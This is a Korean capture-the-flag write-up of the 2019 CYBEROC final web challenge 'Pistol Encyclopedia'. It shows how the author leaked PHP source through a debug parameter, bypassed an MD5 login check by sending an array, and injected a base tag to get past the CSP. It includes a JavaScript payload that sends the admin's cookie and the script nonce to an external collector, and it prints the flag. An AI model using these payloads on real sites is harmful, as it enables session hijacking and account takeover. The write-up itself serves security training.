---
title: 2019 사이버 작전 경연 대회 본선 Pistol Encyclopedia (2019 CYBEROC FINAL)
---

# Pistol Encyclopedia

웹서버 접속 이후, ``http://52.78.151.181/howtobuy.php``로 페이지를 이동을 하였다.
![https://s3-us-west-2.amazonaws.com/secure.notion-static.com/85044df2-d5f1-4387-b1a7-102e7c44ece5/Untitled.png](https://s3-us-west-2.amazonaws.com/secure.notion-static.com/85044df2-d5f1-4387-b1a7-102e7c44ece5/Untitled.png)

위 사진처럼, "스페셜"이라는 조건이 성립이 되어야, 총기를 구매를 할 수 있다고 되어 있었다.

![https://s3-us-west-2.amazonaws.com/secure.notion-static.com/5a0f4772-2435-4a5f-a8d4-b62ceb7f52e6/Untitled.png](https://s3-us-west-2.amazonaws.com/secure.notion-static.com/5a0f4772-2435-4a5f-a8d4-b62ceb7f52e6/Untitled.png)

호기심으로, "페이지 소스 보기" 기능을 활용해서, 주석이 있다는 사실을 알 수 있었다.
![https://s3-us-west-2.amazonaws.com/secure.notion-static.com/5a0f4772-2435-4a5f-a8d4-b62ceb7f52e6/Untitled.png](https://s3-us-west-2.amazonaws.com/secure.notion-static.com/5a0f4772-2435-4a5f-a8d4-b62ceb7f52e6/Untitled.png)
그러므로 ``get_perm.php``로 접속을 하였다. 접속 후 또 다시 주석을 확인하기 위해서, "페이지 소스 보기"를 하였다.
``?remote_debug=1``가 주석이 되어있었다. 해당 주석을 확인하여, 주소 뒤에 추가하여 다시 접속을 하였다.

```php
<?php

if (basename(__FILE__) == basename($_SERVER["SCRIPT_FILENAME"])
    && isset($_GET["remote_debug"]))
  die(show_source(__FILE__));

if(!isset($_SESSION))
  session_start();

function is_special() {
  if(!isset($_SESSION["perm"]))
    return false;
  return $_SESSION["perm"];
}


if(isset($_GET["cred_plain"])) {
  $cred = $_GET["cred_plain"];
  $avail_users = [
    "admin" => "f6566fbef52560d383f5aa6a100697d8",
    "manager" => "ab1f6495fcbec4f0ea50425cc5539672",
    "guest" => false //Guest doesn't need to have credential!
  ];

  if(strpos($_SERVER["QUERY_STRING"], "cred_plain") || // During development, you can't get credential with cred_plain
      strpos($_SERVER["QUERY_STRING"], "["))            // Don't cheat!
    die("Don't cheat");

  if(in_array(md5($cred), $avail_users))
    $_SESSION["perm"] = true;
  else
    $_SESSION["perm"] = false;
}

if (basename(__FILE__) == basename($_SERVER["SCRIPT_FILENAME"])) {
  echo "<h4>You are ".(is_special() ? "special" : "not special")." now </h4>";
}
?>
<!-- ?remote_debug=1 -->
1
```

위처럼 그대로, 소스가 나온다는 사실을 알 수 있었다.

``cred_plain``을 통해서, 스페셜 등급으로 만들 수 있을 것으로 보입니다.

```php
  if(in_array(md5($cred), $avail_users))
    $_SESSION["perm"] = true;
  else
    $_SESSION["perm"] = false;

function is_special() {
  if(!isset($_SESSION["perm"]))
    return false;
  return $_SESSION["perm"];
}
```
위에 코드처럼, ``$_SESSION``에서 ``["perm"]``이 만약 있을 경우, 
스페셜로 취급을 받을 수 있다.
그렇다면, 만약 어떻게 해야 스페셜이 될 수 있는지 알아보도록 하였다.

```php
<?php
$a = [];
if(!md5($a))
{
    echo "MD5 TRICK!";
}
?>
```
**md5 함수**는 **배열**을 받아들이면 **false**를 내뱉는데, 이 **false**가 **$avail_users 딕셔너리**에 **'guest'** 항목이므로 **in array 함수**가 **참**이 된다. 그러면  **cred_plain**이 배열이어야 한다.

베열로 만들기 위해서는 아래 URL로 접속을 하면 된다.

``http://52.78.151.181/get_perm.php?cred_plain%5B%5D=asdfasdfsdfsdf``

**%5B%5D == []  ←** [] 값을 **URL Encode**를 해준 다음, 그 다음 **value**에 아무값을 넣어주면  ****

**You are special now** 라는 **result**가 나올 수 있었던 것이다.

이제 총기를 살 수 있는 **"스페셜"**이 되었다!

![https://s3-us-west-2.amazonaws.com/secure.notion-static.com/4490c58d-cc61-441b-aac8-59e22393471d/Untitled.png](https://s3-us-west-2.amazonaws.com/secure.notion-static.com/4490c58d-cc61-441b-aac8-59e22393471d/Untitled.png)

1. Product Code - 총기 코드
- 아무런 글자를 입력해도 상관이 없다.
2. Purpose of use (free format, max 300 letters) - 편지 내용
- html tag를 사용 가능하나 일부 필터링 됨.

해당 문제에 대해서는 **XSS**로 보여, **XSS** 역적인(?) **CSP** 정책을 확인해보도록 하자!
![https://s3-us-west-2.amazonaws.com/secure.notion-static.com/e5758269-7443-4bf7-b5fc-467924607b2c/Untitled.png](https://s3-us-west-2.amazonaws.com/secure.notion-static.com/e5758269-7443-4bf7-b5fc-467924607b2c/Untitled.png)

위와 같이 **CSP base-uri Policy**이 안되어있는 것으로 보아, **base tag**를 할용하면, XSS를 가능합니다.

```html
</textarea> <base href="http://yunseok.kr"/>
```

위와 같이 하였다.

3. Pistol lincese (jpg/png/gif, 300KB max) - 총기 라이센스
- 하지만 아무런 사진을 올려도 무관함
4. Proof of work - 이 부분은 아래 코드로 쓱쓱 가능함.
```python
from hashlib import sha1

def get_hash(target):
    for val in range(10000000):
        if sha1(str(val).encode('utf-8')).hexdigest()[:5] == target:
            print(val)
            break


stra = input()
get_hash(stra)
```

``Proof of work`` 입력 칸에는 위의 코드를 통해서, 올바른 값을 넣을 수 있었다.

이후 Request 보내기 전에 아래를 참고하여 하도록 하자!

```javascript
var payload = document.cookie;
var nonce = document.querySelector("script").nonce;

var src = `https://postb.in/1569059561759-0691916393116?hello=/?${payload}`

var s = document.createElement('script')
s.type = 'text/javascript'
s.src = src
s.setAttribute('nonce', nonce)

document.body.appendChild(s);
```

그렇게 될 경우 해당 페이지의 **스크립트가 로드** 되는 부분이 
[http://52.78.151.181/static/js/jquery.min.js](http://52.78.151.181/static/js/jquery.min.js) 라는 부분이 [http://yunseok.kr/static/js/jquery.min.js](http://52.78.151.181/static/js/jquery.min.js)

으로 변하기 때문에, 이를 활용하여 [**http://yunseok.kr/static/js/jquery.min.js**](http://52.78.151.181/static/js/jquery.min.js) 에 **세션 탈취**를 위한 코드를 올려두고 **Send Request**를 보낼 경우 기달리면 **어드민이 접속 후 세션을 탈취**할 수 있게 되는 것이다!
아래 코드는 [http://yunseok.kr/static/js/jquery.min.js](http://52.78.151.181/static/js/jquery.min.js) 이다!

![https://s3-us-west-2.amazonaws.com/secure.notion-static.com/b01234a5-a6e3-4f12-98fe-ec82eddd3c12/Untitled.png](https://s3-us-west-2.amazonaws.com/secure.notion-static.com/b01234a5-a6e3-4f12-98fe-ec82eddd3c12/Untitled.png)

위와 같이 th1s1sv3rys3cr3tm4g1c0fc55 라는 세션값이 나왔다!

## Flag is ``FLAG{th1s1sv3rys3cr3tm4g1c0fc55}``
